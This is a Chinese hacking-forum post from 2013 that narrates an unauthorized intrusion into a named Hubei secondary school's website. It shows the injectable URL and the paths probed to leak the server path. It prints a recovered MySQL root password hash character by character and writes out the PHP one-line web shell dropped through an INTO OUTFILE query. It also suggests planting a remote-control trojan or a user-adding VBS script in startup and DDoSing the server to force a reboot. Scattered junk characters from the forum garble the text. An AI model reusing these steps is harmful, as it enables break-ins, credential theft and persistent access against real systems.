中国网络渗透测试联盟

标题: 友情检测湖北省大治市第一中学 [打印本页]

作者: admin    时间: 2013-1-11 21:32
标题: 友情检测湖北省大治市第一中学
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ V4 k, E$ v0 L4 d- b8 }$ O
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!  b! }4 R* U' v: q1 ]  g# @

4 e  y- m: Y( S6 D/ M# S6 P5 T) w: }# z! h5 S

, N. ]5 C6 O% p! P常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
: Y  w- Z( ?+ I1 u" h) s  `
! b8 U4 l0 ?9 H那么想可以直接写入shell ,getshell有几个条件:
6 {2 j3 S3 I  J" |9 @) Y* Y
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
/ n( P8 r$ B4 [9 o
1 u2 M% `* m% s0 U) p试着爆绝对路径:
) F) H& C9 {) Q6 |1./phpMyAdmin/index.php?lang[]=1  
0 A+ y6 V7 k, T* }3 k' }% A- Z2./phpMyAdmin/phpinfo.php  $ J1 Z) e/ b3 B( c3 [1 A3 v/ A
3./load_file()  2 I. a/ I, u& _5 S. ^5 h
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  0 ?  j+ K, a+ ]! z$ y7 r& Y
5./phpmyadmin/libraries/select_lang.lib.php  
5 v6 u' R- ~* T. J- P0 C6./phpmyadmin/libraries/lect_lang.lib.php  6 @, O8 \7 g* f: U6 x, q4 u
7./phpmyadmin/libraries/mcrypt.lib.php   # P* ]+ c0 S4 x
8./phpmyadmin/libraries/export/xls.php  , @2 {, t# A0 p( m/ g  m. v- h! ^

2 {8 d9 h+ R( W. j( x* \均不行...........................
5 P2 r( K8 R& Q) M: b
8 ~! x4 F+ r$ V御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 {( c7 f4 ~1 ?- q
# t- c) D2 C+ a( v权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
% g2 k6 I3 F! n+ a* e2 i' L: p* r* ^2 Y- F3 }6 x$ g7 @2 Q4 v
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
, U2 `1 O; ?8 c6 L' a6 w1 D' u' A! ~& s$ M
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
" n+ d, ~" p4 w) V4 C' F# T7 P2 V
0 @; M9 C* Z+ ~  w5 M2 \& w4 |想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 1 g; [7 }6 v- K/ Z0 Y
  I2 v1 }5 x) b3 r3 ^5 ~- l
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini   K; \2 q0 e- w; D
  W5 m. ]' a8 \  L7 J+ ]& z
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
2 d0 X8 L( ]# T' {, i: h! S0 t- d3 M8 ^0 l. L
成功读到root密码:
" ]$ {0 m. [# k' {# c! K+ w3 }7 L6 C# [  p5 v
17---- r(0072)& v0 r- Q1 G6 Y( ]$ Y* R
18---- o(006f)7 A$ C; l8 V* `, t0 b% @; o
19---- o(006f)
8 \& c9 G& |6 ^3 F20---- t(0074)9 o8 n2 d* Z% r
21---- *(002a)
4 [# ^# w! W, B: [7 R+ o22---- 8(0038)2 j+ J( \& x2 G; g) N% o* t5 Q
23---- 2(0032)
2 Z: M% [6 b, O6 J24---- E(0045). v# `# f, V) @5 D, O  `
25---- 1(0031)+ T! M$ v% b; |% |4 u% J
26---- C(0043)5 v3 K- s% q* Z9 J% x' P
27---- 5(0035)
4 N2 r0 I4 n5 K& |. f- J28---- 8(0038)7 s8 e8 e8 [7 ]1 `& M
29---- 2(0032)
. O) F; w( _" P  ?  c% i$ \' g30---- 8(0038)0 m0 f0 Q6 s; k& h! C
31---- A(0041)2 E* E3 V/ W( ]: \( J/ \# G0 A- |
32---- 9(0039)! t5 V- D7 V7 p/ k) l+ @
33---- B(0042)
( R7 k# l8 @9 @+ H34---- 5(0035)
. O5 {, U# a2 Z" m+ o) u8 F& M' k; r35---- 4(0034)
. F9 {6 |3 I. L& ]! Y. c' h, w) ]36---- 8(0038). ?0 f; c) K6 ~- e
37---- 6(0036)
5 D7 z: F: }/ [7 I. m, f' P& j38---- 4(0034)
) \& Y$ b5 _, C2 P39---- 9(0039)# L6 X- f- o$ D
40---- 1(0031)1 y$ E1 w+ y+ a
41---- 1(0031)
4 G+ {$ _  k5 f. U9 i% z: l' L42---- 5(0035)
0 A, B- h# v* I43---- 3(0033)
- `( `* \- n. T2 |7 D8 ?44---- 5(0035)% q/ j2 g: `- E( T+ `! e
45---- 9(0039). Z8 ?9 L, H* H2 B8 x( n. Y: q, z
46---- 8(0038)0 Q7 R$ ?* V: w: u" G- Y
47---- F(0046)
( h3 p3 O! T* O. u/ o48---- F(0046)* M( E* l9 Y/ T, @% Q
49---- 4(0034)
$ x% U+ p' _& N4 \$ r7 p50---- F(0046), y, {) y. v0 M
51---- 0(0030)- M# W- T* Y: J# J
52---- 3(0033)
* B/ l1 ^: G7 A- ?7 d3 K0 g$ g1 ^53---- 2(0032)3 G$ B. b: m0 J
54---- A(0041)6 C1 n. V2 o5 f* F! X& E
55---- 4(0034)& F$ e; h: u2 Z& a0 i
56---- A(0041)
) |3 q& e% u% X# o9 o57---- B(0042)
9 i2 [* g: ]& }" ^3 ]% n( W( R58---- *(0044)
* A: P, u8 ?* @  s  \59---- *(0035)# y9 Q; i( S; ~& v3 U. U
60---- *(0041)
4 N9 t  ]7 f/ |: E, {9 P1 {5 e61---- *0032)* v2 C% W' [5 {! y: ]
0 m4 J* b' q& j8 ~* ]0 G5 J- K
解密后成功登陆phpmyamin, U7 z( g; ?% l: M, y: A
                          
# A' a$ J2 j) q! l, D- a' J
4 Q9 @! o" Y0 Q: ?9 F- X' L  _                             [attach]164[/attach]9 d! \3 w* c; c, ^7 w6 b

% x1 }- |% S3 I6 h找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
! v& L. e/ E" r/ e. Y. |. Z6 X, Y2 p) y
成功执行,拿下shell,菜刀连接:- {; _5 c: @% w+ C+ x) z& @
. @/ w, e% y* D/ g7 \
服务器不支持asp,aspx,php提权无果.................... H, p1 a6 B- |! _7 W

' F2 K' F5 a- G4 L' i1 o4 E但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
; h' m" @! X& |4 J
服务器上已经有个隐藏帐号了
% c8 T3 F8 O- w; @# h3 O
别名     administrators( H  g6 G3 c6 `$ \+ a
注释     管理员对计算机/域有不受限制的完全访问权

2 ]1 {4 r1 Z$ L/ R5 H7 v- U
成员
& `% e" S# X7 t8 w' x7 |& M, \
-------------------------------------------------------------------------------
. Q8 T2 c! O5 A- D$ Vadmin
& r$ u* c4 U( A4 y# mAdministrator. ?* h  X  ~7 ~. w, L# A  ?
slipper$
" k; u; t- v) e- P% Z0 X  ~: l' Csqluser2 L4 r$ j- y4 q5 V, @; {1 P$ A# F, r
命令成功完成。
0 L6 b8 Q$ t7 T& Z9 V/ U$ ^
. ?# r2 L, J9 e! ?# r+ u服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。; u$ U- V1 c! s

1 \1 g( B: m- y6 Qddos服务器重启,不然就只能坐等服务器重启了...............................
  e7 W2 ]5 q# _* [* v$ g; n; H4 h( b! I+ u9 J1 b
      

' z% J  u4 f. d1 H( M1 o" ^
作者: angel    时间: 2013-5-20 15:28





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2